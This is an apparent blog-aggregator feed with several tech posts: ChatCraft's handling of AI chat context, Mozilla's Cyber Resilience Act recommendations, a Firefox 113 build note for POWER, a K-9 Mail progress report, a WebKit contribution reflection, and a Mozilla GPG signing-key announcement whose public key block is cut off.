Just as with a friend, I have to signal to an AI the type of thing I'm after.  Lots has been written about prompting an AI, but increasingly I'm becoming aware of the need to evolve that prompt over a series of messages, to refine the idea (both my own and the AI's), and work toward an understanding.  It's less about coming up with the right magical incantation to conjure an idea into existence, and more like a conversation over coffee with a colleague.  So there's always going to be an enormous, shared context that we generally won't discuss; but in addition to this we necessarily need to build a smaller, more immediate context within the discussion itself.

My interest in AI doesn't include "training LLMs from scratch," which is to say, I'm not concerned with the larger, shared context.  It's fundamentally important, but beyond me.  However, I am fascinated by this more intimate, smaller context that develops within the conversation itself.

Context in ChatCraft

A chat in ChatCraft looks like this:

[Figure: Typical ChatCraft chat]

To begin, we've got the usual back-and-forth you'd expect.  Beneath the UI, we actually have the following:

  1. A system prompt, helping to define the way our assistant will behave.
  2. An AI message, the first one seeded by us.
  3. A user message.
  4. An AI message.
  5. Repeat...

Lots of apps need to hide their system prompt (it's hard to do well!), but ours is easy to find, since ChatCraft is open source:

You are ChatCraft.org, a web-based, expert programming AI.
You help programmers learn, experiment, and be more creative with code.
Respond in GitHub flavored Markdown. Format ALL lines of code to 80
characters or fewer. Use Mermaid diagrams when discussing visual topics.

When the user enables "Just show me the code" mode, we amend it with this:

However, when responding with code, ONLY return the code and NOTHING else (i.e., don't explain ANYTHING).

By the time you read this, it will probably have changed again, but this is what it was when I wrote this post.

The AI/Human Message pairs are kind of an obvious construct, but after using this paradigm for a while, new things are occurring to me.

There is Only One Author

When I'm chatting with a friend, there are two (or more) people involved.  An effective and emotionally safe interaction will involve all parties getting a chance to speak and be heard.  Furthermore, it's important that neither party manipulate or intentionally misrepresent what the other is saying.

These ideas are so obvious that I almost don't need to mention them; and it makes sense that they would find their way into how we model interactions with an AI as well.

In terms of manipulation, much has been said about AI hallucinations and how you have to be careful not to swallow whole any text that an AI provides.  This is true.  But I haven't read as much about people tinkering in the other direction.

When I first started working on ChatCraft, Taras had already added a very important feature: being able to remove a message from the current chat.  If the AI gets off on some tangent that I don't want, I can delete a response and try again.  It doesn't even have to be the last message I delete.

This seemingly simple idea has some profound implications.  By adding the ability to remove a message from anywhere in the current context, we establish the fact that only one party is involved: I am at once the author, editor, and reader.  There is no one else in the chat.

This realization becomes a foundation for building other interesting things. Let me give you a simple example.  ChatCraft takes advantage of GPT's ability to create Mermaid diagrams in Markdown, and lets us render visual graphics:

[Figure: Example Mermaid Diagram in ChatCraft]

It can create some really complex diagrams, which makes understanding difficult relationships much easier.  But it also makes silly mistakes:

[Figure: Syntax Errors in Pie Chart Diagrams]

In these examples, our inline renderer has blown up trying to render diagrams with syntax errors (i.e., the numeric values shouldn't include %, per the docs).  For a while, I was embracing the typical notion of what a "chat" should be and pointing out the error.  "My apologies, you're right..." would come the reply, and the error would get fixed.
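For reference, the fix is tiny: Mermaid's pie syntax expects bare numbers, so stripping the % signs is all it takes (the labels and values here are made up for illustration):

```mermaid
pie title Browser Usage
    %% Invalid: "Chrome" : 65%  (values must be plain numbers)
    "Chrome" : 65
    "Firefox" : 20
    "Other" : 15
```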

But when I'm the only author in the chat, I should be able to manipulate and edit any response, be it mine or the AI's.  Fixing those graphs would be as simple as adding an EDIT button I can click to fix anything in an AI's response, thus unlocking my follow-up messages:

<figcaption>Fixed Pie Diagram</figcaption>

Mixing Multiple AI Models

Another idea that becomes possible is swapping out the AI for one or more of the messages in the chat.  This would be unthinkable in a real chat, or even when chatting with an AI using a commercial product (why would anyone let me bring their competitor's AI into this interaction?).  But in an open source app, I should be able to move effortlessly between chatting with ChatGPT, GPT-4, Claude, Bard, etc.  I owe no fealty to an API provider.  I should be able to pull and mix responses from various AI backends, leveraging different AI models where appropriate for the current circumstance.

Speaking of different models and context, I've also been thinking about context windows.  While chatting with ChatGPT in ChatCraft, I often hit the 4K token limit (it's 8K with GPT-4).  Rarely am I asking a question and getting an answer.  More often than not, it's a slow evolution of an idea or piece of code.  Until now, that's meant I have to start manually pruning messages out of the chat to continue on.  But I've realized that I could implement a sliding context window, which would allow me to chat indefinitely with a ~4K context window that includes the most recent messages.
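As a rough sketch of what that sliding window could look like (the message shape and the 4-characters-per-token estimate here are my assumptions, not ChatCraft's actual code; a real implementation would use a proper tokenizer):

```typescript
type ChatMessage = { role: "system" | "user" | "assistant"; content: string };

// Crude token estimate: roughly 4 characters per token (assumption).
const estimateTokens = (text: string): number => Math.ceil(text.length / 4);

// Keep the most recent messages that fit within the token budget,
// always retaining a leading system prompt if there is one.
function slidingWindow(messages: ChatMessage[], maxTokens: number): ChatMessage[] {
  const system = messages[0]?.role === "system" ? [messages[0]] : [];
  const rest = messages.slice(system.length);
  let budget =
    maxTokens - system.reduce((n, m) => n + estimateTokens(m.content), 0);
  const kept: ChatMessage[] = [];
  // Walk backwards from the newest message, keeping whatever still fits.
  for (let i = rest.length - 1; i >= 0; i--) {
    const cost = estimateTokens(rest[i].content);
    if (cost > budget) break;
    budget -= cost;
    kept.unshift(rest[i]);
  }
  return [...system, ...kept];
}
```

The nice property is that pruning happens per-request, so the full chat history stays in the UI; only the context sent to the API shrinks.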

Working with Data

Part of what takes me over the 4K/8K limit is including blocks of code.  I usually write to ChatCraft the way I'd discuss something in GitHub: Markdown with lots of code blocks.  I even find myself copy/pasting three or four whole files into a single message.  It's made me realize that I need to be able to "upload" or "attach" files directly into the chat.  I want to talk about a piece of code, so let me drag it into the chat and have it get included as part of the context.  If I want to deal with it as a piece of text, I can still copy/paste it into my message; but if all I want is for it to ride along with the rest of what I'm discussing, I should be able to add it easily.

The same is true for other kinds of data.  ChatCraft can already render HTML, to build things like charts:

<figcaption>Rendering a Chart.js line chart in ChatCraft</figcaption>

Maybe I want to draw a graph using a bunch of CSV data.  What if I could drag or attach that data into the chat just like I mentioned above with code?  "I need a line graph of this CSV data..."

Conclusion

I want to build a bunch of this, but thought I'd start by writing about it.  Using ChatCraft to build ChatCraft has evolved my understanding of what I want in an AI, and it's fun to be able to prototype and explore your own ideas without having to wait on features (or even access!) from big AI providers.

Mozilla Open Policy & Advocacy BlogMozilla weighs in on the EU Cyber Resilience Act

Cybersecurity incidents and attacks have been on the rise in the past years. Enhancing security and trust is more relevant than ever to protect users online. Legislators worldwide have been contemplating new rules to ensure that hardware and software products become more secure, with the latest example being the EU’s Cyber Resilience Act. Below we present our concrete recommendations on how legislators can ensure that the CRA can effectively achieve its objectives.

In recent years, the European Commission has taken concrete steps to boost its cyber security capabilities across Europe. After successfully adopting the NIS2 Directive and the EU Cybersecurity Act, the last missing piece of the puzzle is the Cyber Resilience Act (CRA). This latest proposal aims to bolster the security capabilities of hardware and software products in the EU market while ensuring a more coherent framework that facilitates compliance.

At Mozilla, we believe that individuals’ security and privacy online and a safe Internet overall can only be guaranteed when all actors comply with high cybersecurity standards. We are constantly investing in the security of our products, the internet, and its underlying infrastructure. Therefore, we welcome and support the overarching goals of the CRA. To realize its full potential and achieve its objectives, we call on legislators to consider the following recommendations during the upcoming legislative deliberations:

  • Clarify ‘commercial activity’ for open-source software – free and open-source software promotes the development of the internet as a public resource. Many open-source projects (like Mozilla’s products) have commercial characteristics (i.e., provided in exchange for a price) and, therefore, should abide by the CRA rules. However, there are several open-source projects that will be unintentionally captured by the CRA obligations. For example, merely charging a small fee for the technical support of the freely provided software to fund the financial existence of such projects should not be considered a commercial activity.
  • Align the proposal with existing EU cybersecurity legislation – given the number of legislative initiatives the EU’s cybersecurity package has introduced in the past years, legislators should ensure that obligations around reporting incidents, timeframes, and competent authorities remain aligned across different laws. Such discrepancies can lead to confusion at a time when the efficiency of reporting cybersecurity incidents is paramount.
  • Refrain from disclosing unmitigated vulnerabilities – Mozilla has long advocated for reforms to how governments handle vulnerabilities. Stockpiling vulnerabilities can result in abusive use from governments themselves but also from malicious actors. Policies that mandate the disclosure of unpatched vulnerabilities should be scrutinized carefully. Even if well-intended, we believe that sharing such vulnerabilities with governments creates more risk than it solves.

Clear, proportionate, and enforceable rules are the way forward to achieve cyber resilience of digital products and, eventually, safety for all Internet users. We look forward to working closely with policymakers to realize these goals.

To read Mozilla’s position in detail, click here.

The post Mozilla weighs in on the EU Cyber Resilience Act appeared first on Open Policy & Advocacy.

The Talospace ProjectFirefox 113 on POWER

Yes, I skipped a version, sosumi. I'm running a little low on development space on the NVMe drive, but still managed to squeeze in Firefox 113 which introduces enhanced video Picture-in-Picture, more secure private windows and password generation, support for AVIS images, debugger improvements and additional CSS and API features. As usual you'll need to deal with bug 1775202 either with this patch — but without the line containing desktop_capture/desktop_capture_gn, since that's long gone — or put --disable-webrtc in your .mozconfig if you don't need WebRTC. The browser otherwise builds and works with the PGO-LTO patch for Firefox 110 and the .mozconfigs from Firefox 105.
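For the WebRTC-less route, the relevant line is a one-liner (a minimal fragment; the rest of your .mozconfig stays as before):

```
ac_add_options --disable-webrtc
```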

Mozilla ThunderbirdThunderbird for Android / K-9 Mail: April Progress Report

Thunderbird for Android and K-9 Mail, April 2023 progress report

We’re back with another progress report as we continue improving K-9 Mail for its transformation to Thunderbird for Android! We spent most of the previous month preparing for a new stable release. In April 2023, we finally published K-9 Mail 6.600.

(By the way, if you missed the exciting news last summer, K-9 Mail is now part of the Thunderbird family, and we’re working steadily on transforming it into Thunderbird for Android. If you want to learn more, check out our Android roadmap, this blog post, and this FAQ.)

K-9 Mail 6.600

Along with a couple of new features, a lot of changes and bug fixes went into the new K-9 Mail version. However, space for release notes in app stores is very limited. So we went with this list of changes:

  • Redesigned the message view screen; tap the message header containing sender/recipient names to see more details
  • Added a setting for three different message list densities: compact, default, relaxed
  • Added better support for right-to-left languages when composing messages
  • Search now also considers recipient addresses
  • Fixed a bug where notifications would sometimes reappear shortly after having been dismissed
  • IMAP: Fixed a bug where sometimes authentication errors were silently ignored
  • Various other small bug fixes and improvements

Missing home screen widgets

After learning that an old bug in Android had finally been fixed in 2021, we changed the app to disable home screen widgets by default and only enable them after the user had added at least one account to K-9 Mail. Of course we limited this to Android versions that should include the fix. However, this didn't quite work as intended and existing home screen widgets disappeared on some devices. So we reverted the change in K-9 Mail 6.601.

K-9 Mail 6.7xx

With the stable release out the door, it was time for a new series of beta releases to test early versions of features and fixes that should go into the next stable release.

Bug fixes

The first beta version (6.700) didn't include any new features, but fixed quite a few bugs (mostly obscure crashes).

IMAP ID extension

The GitHub user wh201906 contributed code to add support for the IMAP ID extension (thank you). It is used by an email client to send information about itself to the IMAP server. In turn, the server responds with some information about itself (name, software version, etc).

Unfortunately, some email providers reject clients not using this extension, even though the specification explicitly states the extension must not be used for that purpose. To make K-9 Mail work with such email providers without users having to change a setting, we decided to enable this functionality by default. We also want to align our default values with Thunderbird, which enables it by default.

The information sent to the server is limited to just the app name – “K-9 Mail”. If you wish, you can disable this feature under Settings → <Account> → Fetching mail → Incoming server → Send client ID.
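For reference, an ID exchange as defined in RFC 2971 looks roughly like this (the server's response fields are illustrative, not from a real provider):

```
C: a023 ID ("name" "K-9 Mail")
S: * ID ("name" "Example IMAP Server" "version" "1.0")
S: a023 OK ID completed
```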

Next: Improved account setup

The main goal for the next stable release is to improve the account setup experience. Many new users are struggling with setting up an account in K-9 Mail. That's because K-9 Mail only supports automatic account setup for a handful of large email providers. For all other email providers, users have to manually enter the email server settings, which can be a very frustrating experience.

Ideally, users only have to provide their email address and the app will figure out the rest. We’ll be adding support for Thunderbird’s Autoconfig mechanism which aims to deliver just this user experience.
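For context, an Autoconfig file is an XML document published by (or on behalf of) the email provider that describes its server settings. A sketch for a hypothetical example.com might look like:

```xml
<clientConfig version="1.1">
  <emailProvider id="example.com">
    <domain>example.com</domain>
    <incomingServer type="imap">
      <hostname>imap.example.com</hostname>
      <port>993</port>
      <socketType>SSL</socketType>
      <authentication>password-cleartext</authentication>
      <username>%EMAILADDRESS%</username>
    </incomingServer>
    <outgoingServer type="smtp">
      <hostname>smtp.example.com</hostname>
      <port>465</port>
      <socketType>SSL</socketType>
      <authentication>password-cleartext</authentication>
      <username>%EMAILADDRESS%</username>
    </outgoingServer>
  </emailProvider>
</clientConfig>
```

With a file like this available, the app only needs the user's email address to derive the domain and fetch everything else.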

Hopefully, we’ll be able to ship a first version of this in a beta release in May.

Releases

In April 2023 we published the following stable releases:

… and the following beta versions:

If you want to help shape future versions of the app, become a beta tester and provide feedback on new features while they are still in development.

The post Thunderbird for Android / K-9 Mail: April Progress Report appeared first on The Thunderbird Blog.

Anne van KesterenContributing to WebKit

Over the last couple weeks I have looked at the WebKit code with the intent of fixing a few things in areas of the web platform I’m familiar with as a personal curiosity. The code had always appeared hackable to me, but I had never given it a go in practice. In fact, this is the first time I have written C++ in my life! Marcos had given me a quick guide to set up my environment and I was off to the races.

It has been a lot of fun trying to get things to compile and making tests pass, and it has also given me the chance to study how things are implemented in more detail.  I wish web standards had some of the checks available in C++.  Now I am well aware that C++ does not have the best reputation, but English is even more error-prone.  Granted, the level of abstraction English sits at can also make things easier.

I can heartily recommend this to anyone who has been interested in doing this, but didn’t because it seemed too intimidating. Mind that the first contribution is a bit of a hurdle and can be humbling. Definitely was for me! I recommend tackling something that seems doable, but as with a lot of things it appears to get easier over time.

Mozilla Security BlogUpdated GPG key for signing Firefox Releases

The GPG key used to sign the Firefox release manifests is expiring soon, and so we're going to be switching over to a new key shortly.

The new GPG subkey’s fingerprint is ADD7 0794 7970 0DCA DFDD 5337 E36D 3B13 F3D9 3274, and it expires 2025-05-04.

The public key can be fetched from KEY files from the latest Firefox Nightly, keys.openpgp.org, or from below. This can be used to validate existing releases signed with the current key, or future releases signed with the new key.
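As a usage sketch (the filenames are illustrative, and the keyserver invocation is my assumption; follow Mozilla's documented verification steps for your specific release), importing the key and checking a signed checksum manifest might look like:

```shell
# Import the release-signing key using the fingerprint quoted above
gpg --keyserver hkps://keys.openpgp.org --recv-keys ADD7079479700DCADFDD5337E36D3B13F3D93274
# Verify a release's detached signature against its checksum manifest
gpg --verify SHA512SUMS.asc SHA512SUMS
```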

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
